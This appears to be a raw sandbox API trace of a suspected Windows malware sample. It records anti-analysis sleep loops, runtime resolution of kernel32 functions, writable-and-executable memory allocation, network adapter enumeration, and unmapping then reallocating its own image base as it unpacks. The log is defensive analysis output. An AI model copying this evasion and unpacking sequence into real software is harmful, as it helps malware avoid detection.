lpBaseAddress=0x4001ee, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ef, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001fa, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.633] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0303.633] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.633] GetProcAddress (hModule=0x759c0000, lpProcName="EnumResourceTypesA") returned 0x75a50efd [0303.633] EnumResourceTypesA (hModule=0x0, lpEnumFunc=0x408bc5, lParam=0x0) [0303.645] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.645] LoadLibraryA (lpLibFileName="shell32") returned 0x76a70000 [0303.648] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.648] GetProcAddress (hModule=0x76a70000, lpProcName="Shell_NotifyIconA") returned 0x76cb8af2 [0303.657] Shell_NotifyIconA (dwMessage=0x0, lpData=0x18f370) returned 1 [0303.673] Shell_NotifyIconA (dwMessage=0x2, lpData=0x18f370) returned 1 [0303.680] LoadLibraryA (lpLibFileName="NTDLL") returned 0x77cb0000 [0303.680] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.681] GetProcAddress (hModule=0x77cb0000, lpProcName="ZwSetInformationProcess") returned 0x77ccfb18 [0303.681] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x22, ProcessInformation=0x400004, ProcessInformationLength=0x4) returned 0x0 [0303.681] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.681] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0303.681] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.681] GetProcAddress (hModule=0x759c0000, lpProcName="Sleep") returned 0x759d10ff [0303.681] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.681] LoadLibraryA (lpLibFileName="user32") returned 0x758c0000 [0303.681] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.682] GetProcAddress (hModule=0x758c0000, lpProcName="GetDesktopWindow") returned 0x758e0a19 [0303.682] GetDesktopWindow () returned 0x10010 [0303.682] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.682] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0303.682] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.682] GetProcAddress (hModule=0x759c0000, lpProcName="HeapAlloc") returned 0x77cde026 [0303.682] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.682] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0303.682] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.682] GetProcAddress (hModule=0x759c0000, lpProcName="SetLastError") returned 0x759d11a9 [0303.682] SetLastError (dwErrCode=0x5) [0303.682] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.682] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0303.682] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.682] GetProcAddress (hModule=0x759c0000, lpProcName="SetErrorMode") returned 0x759d1b00 [0303.682] SetErrorMode (uMode=0x400) returned 0x8001 [0303.682] SetErrorMode (uMode=0x0) returned 0x400 [0303.682] SetErrorMode (uMode=0x8001) returned 0x0 [0303.682] LoadLibraryA (lpLibFileName="ntdll") returned 0x77cb0000 [0303.682] SetErrorMode (uMode=0x0) returned 0x8001 [0303.683] GetProcAddress (hModule=0x77cb0000, lpProcName="NtYieldExecution") returned 0x77ccff2c [0303.683] Sleep (dwMilliseconds=0xf) [0303.707] NtYieldExecution () returned 0x0 [0303.707] Sleep (dwMilliseconds=0xf) [0303.739] NtYieldExecution () returned 0x0 [0303.769] Sleep (dwMilliseconds=0xf) [0303.788] NtYieldExecution () returned 0x0 [0303.820] Sleep (dwMilliseconds=0xf) [0303.911] NtYieldExecution () returned 0x0 [0303.929] Sleep (dwMilliseconds=0xf) [0303.960] NtYieldExecution () returned 0x0 [0303.964] Sleep (dwMilliseconds=0xf) [0303.986] NtYieldExecution () returned 0x0 [0304.005] Sleep (dwMilliseconds=0xf) [0304.071] NtYieldExecution () returned 0x0 [0304.077] Sleep (dwMilliseconds=0xf) [0304.103] NtYieldExecution () returned 0x0 [0304.163] Sleep (dwMilliseconds=0xf) [0304.182] NtYieldExecution () returned 0x0 [0304.186] Sleep (dwMilliseconds=0xf) [0304.201] NtYieldExecution () returned 0x0 [0304.206] Sleep (dwMilliseconds=0xf) [0304.221] NtYieldExecution () returned 0x0 [0304.222] Sleep (dwMilliseconds=0xf) [0304.236] NtYieldExecution () returned 0x0 [0304.237] Sleep (dwMilliseconds=0xf) [0304.251] NtYieldExecution () returned 0x0 [0304.252] Sleep (dwMilliseconds=0xf) [0304.270] NtYieldExecution () returned 0x0 [0304.270] Sleep (dwMilliseconds=0xf) [0304.288] NtYieldExecution () returned 0x0 [0304.291] Sleep (dwMilliseconds=0xf) [0304.308] NtYieldExecution () returned 0x0 [0304.309] Sleep (dwMilliseconds=0xf) [0304.324] NtYieldExecution () returned 0x0 [0304.324] Sleep (dwMilliseconds=0xf) [0304.339] NtYieldExecution () returned 0x0 [0304.341] Sleep (dwMilliseconds=0xf) [0304.356] NtYieldExecution () returned 0x0 [0304.359] Sleep (dwMilliseconds=0xf) [0304.374] NtYieldExecution () returned 0x0 [0304.378] Sleep (dwMilliseconds=0xf) [0304.393] NtYieldExecution () returned 0x0 [0304.398] Sleep (dwMilliseconds=0xf) [0304.413] NtYieldExecution () returned 0x0 [0304.417] Sleep (dwMilliseconds=0xf) [0304.433] NtYieldExecution () returned 0x0 [0304.433] Sleep (dwMilliseconds=0xf) [0304.447] NtYieldExecution () returned 0x0 [0304.449] Sleep (dwMilliseconds=0xf) [0304.466] NtYieldExecution () returned 0x0 [0304.474] Sleep (dwMilliseconds=0xf) [0304.488] NtYieldExecution () returned 0x0 [0304.492] Sleep (dwMilliseconds=0xf) [0304.507] NtYieldExecution () returned 0x0 [0304.513] Sleep (dwMilliseconds=0xf) [0304.530] NtYieldExecution () returned 0x0 [0304.535] Sleep (dwMilliseconds=0xf) [0304.550] NtYieldExecution () returned 0x0 [0304.551] Sleep (dwMilliseconds=0xf) [0304.566] NtYieldExecution () returned 0x0 [0304.574] Sleep (dwMilliseconds=0xf) [0304.589] NtYieldExecution () returned 0x0 [0304.594] Sleep (dwMilliseconds=0xf) [0304.609] NtYieldExecution () returned 0x0 [0304.615] Sleep (dwMilliseconds=0x1f40) [0312.709] SetErrorMode (uMode=0x8001) returned 0x0 [0312.709] LoadLibraryA (lpLibFileName="ntdll") returned 0x77cb0000 [0312.710] SetErrorMode (uMode=0x0) returned 0x8001 [0312.710] GetProcAddress (hModule=0x77cb0000, lpProcName="NtProtectVirtualMemory") returned 0x77cd0028 [0312.710] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f53c*=0x77cc0000, NumberOfBytesToProtect=0x18f540, NewAccessProtection=0x40, OldAccessProtection=0x18f544 | out: BaseAddress=0x18f53c*=0x77cc0000, NumberOfBytesToProtect=0x18f540, OldAccessProtection=0x18f544*=0x20) returned 0x0 [0312.724] SetErrorMode (uMode=0x8001) returned 0x0 [0312.724] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0312.724] SetErrorMode (uMode=0x0) returned 0x8001 [0312.724] GetProcAddress (hModule=0x759c0000, lpProcName="CreateFileA") returned 0x759d53c6 [0312.724] SetErrorMode (uMode=0x8001) returned 0x0 [0312.724] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0312.724] SetErrorMode (uMode=0x0) returned 0x8001 [0312.724] GetProcAddress (hModule=0x759c0000, lpProcName="WriteFile") returned 0x759d1282 [0312.724] SetErrorMode (uMode=0x8001) returned 0x0 [0312.724] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0312.724] SetErrorMode (uMode=0x0) returned 0x8001 [0312.724] GetProcAddress (hModule=0x759c0000, lpProcName="CloseHandle") returned 0x759d1410 [0312.724] SetErrorMode (uMode=0x8001) returned 0x0 [0312.724] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0312.724] SetErrorMode (uMode=0x0) returned 0x8001 [0312.725] GetProcAddress (hModule=0x759c0000, lpProcName="ReadFile") returned 0x759d3ed3 [0312.725] SetErrorMode (uMode=0x8001) returned 0x0 [0312.725] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0312.725] SetErrorMode (uMode=0x0) returned 0x8001 [0312.725] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileSize") returned 0x759d196e [0312.725] SetErrorMode (uMode=0x8001) returned 0x0 [0312.725] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0312.725] SetErrorMode (uMode=0x0) returned 0x8001 [0312.725] GetProcAddress (hModule=0x759c0000, lpProcName="UnmapViewOfFile") returned 0x759d1826 [0312.725] SetErrorMode (uMode=0x8001) returned 0x0 [0312.725] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0312.725] SetErrorMode (uMode=0x0) returned 0x8001 [0312.726] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualProtectEx") returned 0x75a545bf [0312.726] SetErrorMode (uMode=0x8001) returned 0x0 [0312.726] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0312.726] SetErrorMode (uMode=0x0) returned 0x8001 [0312.726] GetProcAddress (hModule=0x759c0000, lpProcName="GetLongPathNameA") returned 0x75a5437f [0312.726] SetErrorMode (uMode=0x8001) returned 0x0 [0312.726] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0312.726] SetErrorMode (uMode=0x0) returned 0x8001 [0312.726] GetProcAddress (hModule=0x759c0000, lpProcName="TerminateProcess") returned 0x759ed802 [0312.726] SetErrorMode (uMode=0x8001) returned 0x0 [0312.726] LoadLibraryA (lpLibFileName="IPHlpApi") returned 0x756d0000 [0312.736] SetErrorMode (uMode=0x0) returned 0x8001 [0312.736] GetProcAddress (hModule=0x756d0000, lpProcName="GetAdaptersInfo") returned 0x756d9263 [0312.736] SetErrorMode (uMode=0x8001) returned 0x0 [0312.736] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0312.736] SetErrorMode (uMode=0x0) returned 0x8001 [0312.736] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAllocEx") returned 0x759ed9b0 [0312.736] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x2c0000 [0312.736] GetAdaptersInfo (in: AdapterInfo=0x2c0000, SizePointer=0x18f54c | out: AdapterInfo=0x2c0000, SizePointer=0x18f54c) returned 0x0 [0312.749] SetErrorMode (uMode=0x8001) returned 0x0 [0312.749] LoadLibraryA (lpLibFileName="shell32") returned 0x76a70000 [0312.749] SetErrorMode (uMode=0x0) returned 0x8001 [0312.749] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteA") returned 0x76cb7078 [0312.749] SetErrorMode (uMode=0x8001) returned 0x0 [0312.749] LoadLibraryA (lpLibFileName="User32") returned 0x758c0000 [0312.749] SetErrorMode (uMode=0x0) returned 0x8001 [0312.749] GetProcAddress (hModule=0x758c0000, lpProcName="EnumWindows") returned 0x758dd1cf [0312.749] EnumWindows (lpEnumFunc=0x324f62, lParam=0x18f5f0) returned 1 [0312.750] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000000, flAllocationType=0x3000, flProtect=0x40) returned 0x34a0000 [0312.756] SetErrorMode (uMode=0x8001) returned 0x0 [0312.756] LoadLibraryA (lpLibFileName="user32") returned 0x758c0000 [0312.756] SetErrorMode (uMode=0x0) returned 0x8001 [0312.756] GetProcAddress (hModule=0x758c0000, lpProcName="DestroyWindow") returned 0x758d9a55 [0312.756] SetErrorMode (uMode=0x8001) returned 0x0 [0312.757] LoadLibraryA (lpLibFileName="user32") returned 0x758c0000 [0312.757] SetErrorMode (uMode=0x0) returned 0x8001 [0312.757] GetProcAddress (hModule=0x758c0000, lpProcName="EnumThreadWindows") returned 0x758e3961 [0312.757] EnumThreadWindows (dwThreadId=0x6a8, lpfn=0x32508d, lParam=0x758d9a55) returned 0 [0312.757] DestroyWindow (hWnd=0x10120) returned 1 [0312.757] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0312.757] SendMessageA (hWnd=0x10120, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0312.757] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0312.757] SelectObject (hdc=0xc010216, h=0x18a002e) returned 0x1e0a07b2 [0312.757] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0312.758] SelectObject (hdc=0xc010216, h=0x18a002e) returned 0x18a002e [0312.758] SelectObject (hdc=0x300107a0, h=0x103007cf) returned 0x1b00016 [0312.758] SelectObject (hdc=0x300107a0, h=0x1e0a07b2) returned 0x18a002e [0312.758] SelectObject (hdc=0x300107a0, h=0x1900011) returned 0x1900015 [0312.758] SetBrushOrgEx (in: hdc=0x300107a0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0312.758] UnrealizeObject (h=0x1900015) returned 1 [0312.758] SelectObject (hdc=0x300107a0, h=0x1900015) returned 0x1900011 [0312.758] SetBkMode (hdc=0x300107a0, mode=1) returned 1 [0312.758] OleTranslateColor () returned 0x0 [0312.758] SetBkColor (hdc=0x300107a0, color=0xf0f0f0) returned 0xf0f0f0 [0312.758] OleTranslateColor () returned 0x0 [0312.758] SetTextColor (hdc=0x300107a0, color=0x0) returned 0x0 [0312.758] GetROP2 (hdc=0xc010216) returned 13 [0312.758] SetROP2 (hdc=0x300107a0, rop2=13) returned 13 [0312.758] SelectObject (hdc=0xc010216, h=0x1b00016) returned 0x103007cf [0312.758] SelectObject (hdc=0xc010216, h=0x18a002e) returned 0x18a002e [0312.758] SelectObject (hdc=0xc010216, h=0x1900015) returned 0x1900015 [0312.758] SelectPalette (hdc=0xc010216, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0312.758] DeleteDC (hdc=0xc010216) returned 1 [0312.758] SelectObject (hdc=0x300107a0, h=0x1b00016) returned 0x103007cf [0312.758] DeleteObject (ho=0x103007cf) returned 1 [0312.758] SelectObject (hdc=0x300107a0, h=0x1900015) returned 0x1900015 [0312.758] SelectObject (hdc=0x300107a0, h=0x1900015) returned 0x1900015 [0312.758] ReleaseDC (hWnd=0x10120, hDC=0x300107a0) returned 1 [0312.758] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0312.759] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0312.760] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0312.760] SetErrorMode (uMode=0x8001) returned 0x0 [0312.760] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.760] SetErrorMode (uMode=0x0) returned 0x8001 [0312.761] GetProcAddress (hModule=0x759c0000, lpProcName="TerminateThread") returned 0x759d7a2f [0312.761] SetErrorMode (uMode=0x8001) returned 0x0 [0312.761] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.761] SetErrorMode (uMode=0x0) returned 0x8001 [0312.761] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryA") returned 0x759d49d7 [0312.761] SetErrorMode (uMode=0x8001) returned 0x0 [0312.761] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.761] SetErrorMode (uMode=0x0) returned 0x8001 [0312.761] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteFileW") returned 0x759d89b3 [0312.761] SetErrorMode (uMode=0x8001) returned 0x0 [0312.761] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.761] SetErrorMode (uMode=0x0) returned 0x8001 [0312.761] GetProcAddress (hModule=0x759c0000, lpProcName="HeapReAlloc") returned 0x77cf1f6e [0312.761] SetErrorMode (uMode=0x8001) returned 0x0 [0312.761] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.761] SetErrorMode (uMode=0x0) returned 0x8001 [0312.762] GetProcAddress (hModule=0x759c0000, lpProcName="GetNativeSystemInfo") returned 0x759e10b5 [0312.762] SetErrorMode (uMode=0x8001) returned 0x0 [0312.762] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.762] SetErrorMode (uMode=0x0) returned 0x8001 [0312.762] GetProcAddress (hModule=0x759c0000, lpProcName="CreateThread") returned 0x759d34d5 [0312.762] SetErrorMode (uMode=0x8001) returned 0x0 [0312.762] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.762] SetErrorMode (uMode=0x0) returned 0x8001 [0312.762] GetProcAddress (hModule=0x759c0000, lpProcName="HeapAlloc") returned 0x77cde026 [0312.762] SetErrorMode (uMode=0x8001) returned 0x0 [0312.762] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.762] SetErrorMode (uMode=0x0) returned 0x8001 [0312.762] GetProcAddress (hModule=0x759c0000, lpProcName="HeapDestroy") returned 0x759d35b7 [0312.762] SetErrorMode (uMode=0x8001) returned 0x0 [0312.762] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.762] SetErrorMode (uMode=0x0) returned 0x8001 [0312.763] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAllocEx") returned 0x759ed9b0 [0312.763] SetErrorMode (uMode=0x8001) returned 0x0 [0312.763] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.763] SetErrorMode (uMode=0x0) returned 0x8001 [0312.763] GetProcAddress (hModule=0x759c0000, lpProcName="LocalFree") returned 0x759d2d3c [0312.763] SetErrorMode (uMode=0x8001) returned 0x0 [0312.763] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.763] SetErrorMode (uMode=0x0) returned 0x8001 [0312.763] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteCriticalSection") returned 0x77ce45f5 [0312.763] SetErrorMode (uMode=0x8001) returned 0x0 [0312.763] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.763] SetErrorMode (uMode=0x0) returned 0x8001 [0312.763] GetProcAddress (hModule=0x759c0000, lpProcName="GetComputerNameW") returned 0x759ddd0e [0312.763] SetErrorMode (uMode=0x8001) returned 0x0 [0312.763] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.763] SetErrorMode (uMode=0x0) returned 0x8001 [0312.764] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcessHeap") returned 0x759d14e9 [0312.764] SetErrorMode (uMode=0x8001) returned 0x0 [0312.764] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.764] SetErrorMode (uMode=0x0) returned 0x8001 [0312.764] GetProcAddress (hModule=0x759c0000, lpProcName="SystemTimeToFileTime") returned 0x759d5a7e [0312.764] SetErrorMode (uMode=0x8001) returned 0x0 [0312.764] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.764] SetErrorMode (uMode=0x0) returned 0x8001 [0312.764] GetProcAddress (hModule=0x759c0000, lpProcName="GlobalMemoryStatusEx") returned 0x759fd4c4 [0312.764] SetErrorMode (uMode=0x8001) returned 0x0 [0312.764] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.764] SetErrorMode (uMode=0x0) returned 0x8001 [0312.764] GetProcAddress (hModule=0x759c0000, lpProcName="CreateProcessW") returned 0x759d103d [0312.764] SetErrorMode (uMode=0x8001) returned 0x0 [0312.764] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.764] SetErrorMode (uMode=0x0) returned 0x8001 [0312.764] GetProcAddress (hModule=0x759c0000, lpProcName="WideCharToMultiByte") returned 0x759d170d [0312.765] SetErrorMode (uMode=0x8001) returned 0x0 [0312.765] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.765] SetErrorMode (uMode=0x0) returned 0x8001 [0312.765] GetProcAddress (hModule=0x759c0000, lpProcName="InterlockedIncrement") returned 0x759d1400 [0312.765] SetErrorMode (uMode=0x8001) returned 0x0 [0312.765] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.765] SetErrorMode (uMode=0x0) returned 0x8001 [0312.765] GetProcAddress (hModule=0x759c0000, lpProcName="GetSystemTime") returned 0x759d5a96 [0312.765] SetErrorMode (uMode=0x8001) returned 0x0 [0312.765] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.765] SetErrorMode (uMode=0x0) returned 0x8001 [0312.765] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFreeEx") returned 0x759ed9c8 [0312.765] SetErrorMode (uMode=0x8001) returned 0x0 [0312.765] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.765] SetErrorMode (uMode=0x0) returned 0x8001 [0312.765] GetProcAddress (hModule=0x759c0000, lpProcName="IsBadReadPtr") returned 0x759fd075 [0312.765] SetErrorMode (uMode=0x8001) returned 0x0 [0312.765] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.766] SetErrorMode (uMode=0x0) returned 0x8001 [0312.766] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiW") returned 0x759ed5cd [0312.766] SetErrorMode (uMode=0x8001) returned 0x0 [0312.766] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.766] SetErrorMode (uMode=0x0) returned 0x8001 [0312.766] GetProcAddress (hModule=0x759c0000, lpProcName="OpenMutexW") returned 0x759d5151 [0312.766] SetErrorMode (uMode=0x8001) returned 0x0 [0312.766] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.766] SetErrorMode (uMode=0x0) returned 0x8001 [0312.766] GetProcAddress (hModule=0x759c0000, lpProcName="SetEndOfFile") returned 0x759ece2e [0312.766] SetErrorMode (uMode=0x8001) returned 0x0 [0312.766] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.766] SetErrorMode (uMode=0x0) returned 0x8001 [0312.766] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentThread") returned 0x759d17ec [0312.766] SetErrorMode (uMode=0x8001) returned 0x0 [0312.766] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.766] SetErrorMode (uMode=0x0) returned 0x8001 [0312.767] GetProcAddress (hModule=0x759c0000, lpProcName="FlushFileBuffers") returned 0x759d469b [0312.767] SetErrorMode (uMode=0x8001) returned 0x0 [0312.767] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.767] SetErrorMode (uMode=0x0) returned 0x8001 [0312.767] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveVectoredExceptionHandler") returned 0x77d25f41 [0312.767] SetErrorMode (uMode=0x8001) returned 0x0 [0312.767] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.767] SetErrorMode (uMode=0x0) returned 0x8001 [0312.767] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentProcess") returned 0x759d1809 [0312.767] SetErrorMode (uMode=0x8001) returned 0x0 [0312.767] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.767] SetErrorMode (uMode=0x0) returned 0x8001 [0312.767] GetProcAddress (hModule=0x759c0000, lpProcName="SetErrorMode") returned 0x759d1b00 [0312.767] SetErrorMode (uMode=0x8001) returned 0x0 [0312.767] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.767] SetErrorMode (uMode=0x0) returned 0x8001 [0312.767] GetProcAddress (hModule=0x759c0000, lpProcName="GetVersionExW") returned 0x759d1ae5 [0312.768] SetErrorMode (uMode=0x8001) returned 0x0 [0312.768] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.768] SetErrorMode (uMode=0x0) returned 0x8001 [0312.768] GetProcAddress (hModule=0x759c0000, lpProcName="DuplicateHandle") returned 0x759d1886 [0312.768] SetErrorMode (uMode=0x8001) returned 0x0 [0312.768] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.768] SetErrorMode (uMode=0x0) returned 0x8001 [0312.768] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleHandleA") returned 0x759d1245 [0312.768] SetErrorMode (uMode=0x8001) returned 0x0 [0312.768] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.768] SetErrorMode (uMode=0x0) returned 0x8001 [0312.768] GetProcAddress (hModule=0x759c0000, lpProcName="AddVectoredExceptionHandler") returned 0x77d2742b [0312.768] SetErrorMode (uMode=0x8001) returned 0x0 [0312.768] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.768] SetErrorMode (uMode=0x0) returned 0x8001 [0312.768] GetProcAddress (hModule=0x759c0000, lpProcName="ExitProcess") returned 0x759d7a10 [0312.768] SetErrorMode (uMode=0x8001) returned 0x0 [0312.768] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.769] SetErrorMode (uMode=0x0) returned 0x8001 [0312.769] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentProcessId") returned 0x759d11f8 [0312.769] SetErrorMode (uMode=0x8001) returned 0x0 [0312.769] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.769] SetErrorMode (uMode=0x0) returned 0x8001 [0312.769] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileW") returned 0x759f830d [0312.769] SetErrorMode (uMode=0x8001) returned 0x0 